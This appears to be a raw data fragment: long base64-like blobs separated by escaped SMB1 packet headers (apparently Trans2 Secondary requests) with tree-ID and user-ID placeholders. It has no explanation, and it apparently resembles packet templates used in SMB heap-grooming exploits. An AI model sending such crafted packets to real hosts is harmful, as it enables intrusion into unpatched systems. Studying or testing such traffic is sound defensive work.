Yy3/WujraijCVFkSBEb5vZxPPSXPnUFtStdhD8Ntocz0tsZNisxGxOJOYLjE33CI3qJU+Dluy1Ks0a5UTOSzpXt4Pa0ypNQhQ1SluqL2CK5u5XfSOKtJBSxRk0PbECzO6YAJHo5k5vjZDAf9NoaYketzhUSI0JZfn8ujw0OyyGsXRpF1mi20mnrxau9P+3M/yTl6Hy02KgZOaKv/JNxkk/GFg70MaDu88N94oeQzV8cOCpzoTCEeBrx8hTwj9TgrlgZvXze353pfSwVS5xFcPT+Gmp1E1TMadDs0nlbPlGBftJmUsG7mvQfgv4XYX0AMxz5YrqwGJfvTxKniphkH0HXhQlkKV0w/J/IVfQFQcGVrh3zZeE9PByrd7oxpyNSiXlIU9AUZp7WKzuVPIMQx3y4/g6QZbZprnHbUCiv9fVqYSj3+cwna2fn7kxdHqTGF13uO4uivs86us1LLjCZeiB4Zo4ih/2f4DNmcWoXHmb3FIWmNCm5LQM7Omt1BXKyaUyPUz5z0Z8HBNxhZNjepldrabniSaClovGr/IwlgOD8OqCcKqOiQaDknm42wYGpmiz9Cu9EJ4MlMXu7wK15mDoq8LjQGc/MIbd4tNUoGPn5IFTEgUW6WiWoOPPY8KQ1qDj+aj6+fa4nE110n8PKNq2bP7yT+4ECd9Lq+vZJ/M1sA3R0EgHrHbYwugIZ5pASDi2LnPObGl8cJS/UQHkDtSLetS2yWFfU+iWIDjRRevP/bhH772zLl3gQWvwbzNO9w3DwQXMnHYax5IGrteBE2MkVM6i+lIuARztgedFvit2bBEL60yH/3rW+nXGc8GWsIblQ60OLsm7guRTTIV4urL/7R1pUT5duqZDOd3XSXctur2mjI4s0yj0WJP7uKwyGdt2efzPBOc0lhwDbEzoBfYGbayxH4uzo2kVFaDMfqCsFNHOLesj2DEYYN+56MNjj9EyPeaKV6hjmvmVZaSqap4Id5bmE0ygYy4Yu8foJOgepheiUoBMJ6sEE2iJ+0kz0CiteZitgvfsY3Cw10DRvupMp14UrX43NWEZirinj+99Ay36xRs6KzpPiXRcpLbOwVY0pJPKj5UxZkG6tz5wziy0ZEsTLD0NQTA9lrxxCSQ0EupqyaW5flVuiVmD3PsIG0a6hkzNn9Ne/GJ5redmAF1DytSDWxoH4uEzdG2bN/Zlf9DW6pyBMblr3ZsZxjcLTG0dl2t+v+3k/uoWVsy9tm8c1GXe5UU6bmeQoTNckekNd1s6fIeK7wMaStu3KQjlan0TtuummxbBCHyRcwKcT6ImPlt+bk7No9m04cFBKFqZJYzYIjtGHUOgGMxsfdbjmSW3nClk98XpOoKug+2vcD0SBYrAZoqB4Mf/LLpWuZeYIbU+AEKZj2u6xb\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0s\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x83\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x93\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x10wTmraUrzXWEfHD1L07qNWDFDeqVkVNeNLgdHOpiYn9eR6PbyinvIIQoegYlW0IySopNdfCJfeQwPh5sbQa8ZUdSofQ13qkeX2e+niELSfzfltgyDQy36ZrqXsoGnmkCBkcWGjSA41I0h7b/KLvyDxbyiVFBmkD7M7ED8wfWjSjMVVYMgsD+VN6K3+Y4EkMHiaClZrqhlPNpou9nHHpX5bR8fS15KSItkfW7qDVmvX1lAuwXGxDZDNvvBxeOokS6Ovsp1ar412A8FGdOOWlc/Mj3yAYo0xt9eeW+pS6jXCYwiWqzvD2Gm8tf1EVfsfFvHqKPkOYhFvOZTfa9PCLAOPtymNu6BgV4gco3AeT4L59JFsYBaX1qHyTeFB0SRBqEHWAIv5dNL5lSYCq/1NVzWPf5n6Uc+289bgNgkkj2CCxVjbePMB3qnOm0HgPr6NDj6TGaq0r+qBtBENNMoW4/bFmlG3Gg/HVGlkhfbu8seDsbQsOkqoeIdcsUJy3OTSZc3jBaIVJZhZmaBZnVjbBdDA7xlIpTiUJnN7KBuPvdQKFjesNpF+/jdNI0nYWX5P4nU+Kt6BDDnaQCfoo8M3YYUZMDzr/m1MCo5NWkjVUVb+qQSxCXqFST/5i5vNVr90mg9uQEzX/KfQhEYmjPwib+7Cg2gLEiczM8bujZkmwux2s54EFB7KsGXH3A5Vh/xTtAhMheH87dl5HGXB/6X4QVegZSXwc/eArrR8n7x5cB8lO3eZI2j2ciQo6nsBc+D7vm0gjgrRzw5b3Td+Lt6V+azRlR8/Jez/xMW8ievM76g9DixTSCcfo3Qn7